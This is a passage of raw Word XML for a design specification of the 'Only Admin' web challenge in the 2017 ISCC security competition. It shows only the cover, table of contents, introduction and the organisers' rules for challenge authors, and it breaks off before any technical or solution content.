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</w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc81986467"/>
      <w:bookmarkStart w:id="1" w:name="_Toc511647049"/>
      <w:bookmarkStart w:id="2" w:name="_Toc2399570"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目编号:ISCC-20</w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>XX-XX</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p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color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>届（20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>）</w:t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信息安全与对抗技术竞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>赛</w:t>
      </w:r>
    </w:p>
    <w:p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题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>明书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【！严格保密！请将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>所有资料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>打</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>包加密传输！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="45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6192"/>
      </w:tblGrid>
      <w:tr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/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Only Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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1"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri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1"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="43"/>
              </w:rPr>
              <w:commentReference w:id="1"/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default" w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>WEB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>秦凯</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Wpsec_1战队</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>17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年</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>06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月</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>20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日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pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:spacing w:before="0" w:line="400" w:lineRule="atLeast"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p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3" w:name="_Toc511534546"/>
    </w:p>
    <w:p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>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="500" w:lineRule="exact"/>
        <w:ind w:firstLine="643" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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文档变更记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（A：增加、M：修改、D：删除）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="45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119"/>
        <w:gridCol w:w="1766"/>
        <w:gridCol w:w="1714"/>
        <w:gridCol w:w="3127"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="254" w:hRule="atLeast"/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描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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秦凯</w:t>
            </w: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2017.06.20</w:t>
            </w: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初稿</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="楷体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="5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  录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pP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"_Toc454094894" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:kern w:val="44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  <w:kern w:val="44"/>
        </w:rPr>
        <w:t>引言</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094894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"_Toc454094895" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>1.1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_Toc454094895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"_Toc454094896" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>1.2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缩写定义</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094896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"_Toc454094897" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:kern w:val="44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  <w:kern w:val="44"/>
        </w:rPr>
        <w:t>关卡设计</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094897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"_Toc454094898" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.1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出题要求</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094898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"_Toc454094899" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.1.1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服务器类题目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_Toc454094899 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3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"_Toc454094900" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.1.2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附件下载类题目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_Toc454094900 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>3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"_Toc454094901" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.2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设计思路</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094901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"_Toc454094902" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.2.1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题目背景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_Toc454094902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"_Toc454094903" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.2.2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题目特点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_Toc454094903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"_Toc454094904" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.2.3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题目考察点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_Toc454094904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"_Toc454094905" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.3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关键技术及解决方案</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094905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"_Toc454094906" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.3.1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关键技术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_Toc454094906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"_Toc454094907" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.3.2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解决方案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_Toc454094907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"_Toc454094908" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.4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题目名称及描述</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094908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"_Toc454094909" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.4.1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题目名称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_Toc454094909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"_Toc454094910" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>2.4.2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42"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>题目描述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_Toc454094910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"_Toc454094911" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.5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题目部署方法</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094911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"_Toc454094912" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.6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过关流程及过关标志</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094912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"_Toc454094913" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>2.7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硬件使用及网络拓补</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094913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"_Toc454094914" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42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相关问题</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094914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"_Toc454094915" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>3.1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题目分值</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094915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"_Toc454094916" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>3.2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题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094916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"_Toc454094917" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>3.3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竞赛阶段服务器端监控方法</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094917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"_Toc454094918" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>3.4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须注意的问题</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094918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"_Toc454094919" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42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附件</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094919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"_Toc454094920" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
        </w:rPr>
        <w:t>4.1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2"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关附件</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc454094920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</w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc454094894"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>引言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc454094895"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>编写目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文档为第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>届信息安全与对抗技术竞赛(ISCC20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>XX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)关卡类题目的详细设计文档。本文档面向竞赛组织者，用于说明此关卡的设计思路和搭建配置方法，本文档也可作为参赛者竞赛后的学习资料。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc454094896"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>缩写定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="0017C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc82804666"/>
      <w:bookmarkStart w:id="8" w:name="_Toc511571136"/>
      <w:bookmarkStart w:id="9" w:name="_Toc77856825"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0017C0"/>
        </w:rPr>
        <w:t>【文档中所用到的缩写定义】</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="46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6601"/>
      </w:tblGrid>
      <w:tr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</w:tr>
      <w:tr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DHCP</w:t>
            </w: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动态主机配置协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc454094897"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>关卡设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc454094898"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>出题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/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请严格按照模版详细撰写《ISCC分组对抗赛</w:t>
      </w:r>
      <w:r>
        <w:t>-对抗题-设计说明书</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（必须严格按照文档模板要求写，不按照要求写的选手一律给分不超过2分，满分5分）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请严格按照模版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>填写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>《ISCC20XX对抗题-信息简表》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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选手出题需要注意每一道题目放在一个文件夹中，文件夹以“ISCC20XX-编号”命名（例如ISCC2016-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1），每人至少出两道题目；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题目源代码做成压缩包统一放在“题目源代码”文件夹中；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解题工具（便于主办方测试题目、如果工具较大可以只提供工具清单，写在一个txt文件中即可）做成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>压缩包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>统一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“解题工具”文件夹中；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="54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提供给选手的附件做成压缩包统一放在“选手下载附件”文件夹中；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r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题目环境不能因为选手做题而被破坏。限制选手的权限，尤其是写权限。比如随意修改题目服务器内部文件，修改数据库内容和控制题目服务器进行内网扫描等；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修复题目服务器中操作系统的已知漏洞，降低选手利用这些漏洞得分的可能性；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做到一个题目服务器中一个或者多个题目，而不是一个题目多个题目服务器；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赛时的网络环境中会使用网络代理，题目不应与该环境要求有所冲突；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保证</w:t>
      </w:r>
      <w:r>
        <w:t>题目flag的唯一性，不能出现一题多解的情况；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4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r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:iscc2016@163.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
